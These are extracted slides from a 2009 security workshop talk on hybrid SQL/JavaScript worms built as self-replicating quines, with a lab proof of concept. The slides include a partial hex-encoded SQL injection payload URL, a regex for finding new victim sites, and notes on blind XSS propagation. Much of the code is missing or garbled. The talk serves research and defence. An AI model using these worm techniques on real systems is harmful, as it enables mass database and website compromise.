august 26th, 2009
TRANSCRIPT
-
8/14/2019 August 26th, 2009
1/13
Page 1 - CONFIDENTIAL -
SQL/JavaScript Hybrid WormsAs Two-stage QuinesWorkshop Seguridad Informtica 2009 38 JAIIO (MDQ) Lic. Jos Orlicki (jorlicki@)
August 26 th , 2009
-
8/14/2019 August 26th, 2009
2/13
Page 2
Not-So-Secret Agenda
MotivationHybrid ScenarioFeatures DiscussionProof of Concept HighlightsDemo&Discussion!?
Abstract: a what-if worm scenario based onSQL/JS real incidents and prototype code,
leads to proof-of-concept on laboratory withwidely-deployed technologies (unhardened).Helps anticipate future trends and protections.
- DECLASSIFIED -
-
8/14/2019 August 26th, 2009
3/13
Page 3 - CONFIDENTIAL -
Attacks in the Wild! (2008)
[..]Anyone know about www.nihaorr1.com/1.js? The db that
supports our companies ecommerce is lling up with this url[..][..]The script www.nihaorr1.com/1.js is getting inserted into everyrecord of my organizations SQL db. I'm the accidental techie in myoce, and I'm clueless[..]Huge Web Hack Attack Infects Many Pages Gregg Keizer,
Computerworld (nihaorr1 -> favorite search engine)
-
8/14/2019 August 26th, 2009
4/13
Page 4 - -
Prototype of infected RFIDs! (2006)
Is Your Cat Infected with a Computer Virus? Melanie R. Rieback,Bruno Crispo, Andrew S. TanenbaumSQL Virus Prototype propaging via RFID tags. (Virus != Worm?)Uses SQL Quines, self-replicating statements.
-
8/14/2019 August 26th, 2009
5/13
-
8/14/2019 August 26th, 2009
6/13
Page 6
Basic Quines in T-SQL and Javascript
Version 1: quine classic techniques in T-SQL
- NOT CONFIDENTIAL -
-
8/14/2019 August 26th, 2009
7/13Page 7
Basic Quines in T-SQL and Javascript
Version 2: quine using native reflection hack in T-SQL
- NOT CONFIDENTIAL -
-
8/14/2019 August 26th, 2009
8/13Page 8
Basic Quines in T-SQL and Javascript
Version 3 (fail!): quine classic and native getElementById()
techniques in SQLSimilar to Version 1 but on the JS/client-side
Similar to Version 2 but idem
- NOT CONFIDENTIAL -
-
8/14/2019 August 26th, 2009
9/13Page 9 - CONFIDENTIAL -
Proof of Concept
Lab:1. CherryPy,2. Two ad-hoc-vulnerable webapps in different domains,3. MS-SQL.4. Python SQL interface, no modifications.
Two-stage self-replication.Targets VARCHAR and TEXTdb fields, ALL TABLE s
Version 1 : MS-SQL Quines, JavaScript regexes to extract newpossibles victim URL, blind injection. ( 7359 bytes of SQLi egg )Version 2 : MS-SQL Reflective Features. ( 3000 bytes aprox, idem )Version 3 (fail!): JavaScript quines and reflection worked,complete worm dont. ( estimating 1500 bytes )
-
8/14/2019 August 26th, 2009
10/13Page 10
Proof of Concept (cont.)
SQL Hex and URL Encoding : stealthness and SQLi correctness. 4-
variable (original, 1 variable, 2008) scattered egg
http://192.168.1.105:8081/greetUser?numid=1%3BDECLAR E+@S+VARCHAR(MAX),@S2+VARCHAR(MAX),@S3+VARCHAR(MAX),@S4+VARCHAR(MAX)%3BSET+@S=CAST( 0x0d0a444398498468 ...
Regex matching for detecting possible new victim sites. var regexp = new RegExp(" [a-zA-Z0-9-.?_&=:\/]+\/[a-
zA-Z0-9-\.?_&=]+=[0-9]+ "," g"); var m = infected_html .match(regexp);
Javascript blind XSS for progapagation ( very naive! )document.write("
);- NOT CONFIDENTIAL -
-
8/14/2019 August 26th, 2009
11/13Page 11 - CONFIDENTIAL -
Hybrid Worms Discussion!
Billy Hoffman and John Terrill. The Little Hybrid Web Worm that Could , Black-Hat USA2007. (they focus in JS obfuscation and Perl)
No choke point.Stealthier infections.More portability (interpreted lang?)
Target generic vulnerabilities (idem)Easily obfuscated (idem)Less crashes (idem)
Data/Web 2.0/Cloud centric?
-
8/14/2019 August 26th, 2009
12/13Page 12
Demostration!?
...but I can only show you the door. You're the one that has to walkthrough it...
Acknowledgements:- Core Security Team : support and creative environment.- Sebastin Cufre : T-SQL tricks.- Aureliano Calvo : Javascript concepts.- Pedro Varangot : suitable testing computer.
- DECLASSIFIED -
-
8/14/2019 August 26th, 2009
13/13Page 13 CONFIDENTIAL
Questions?
Thanks!Contact :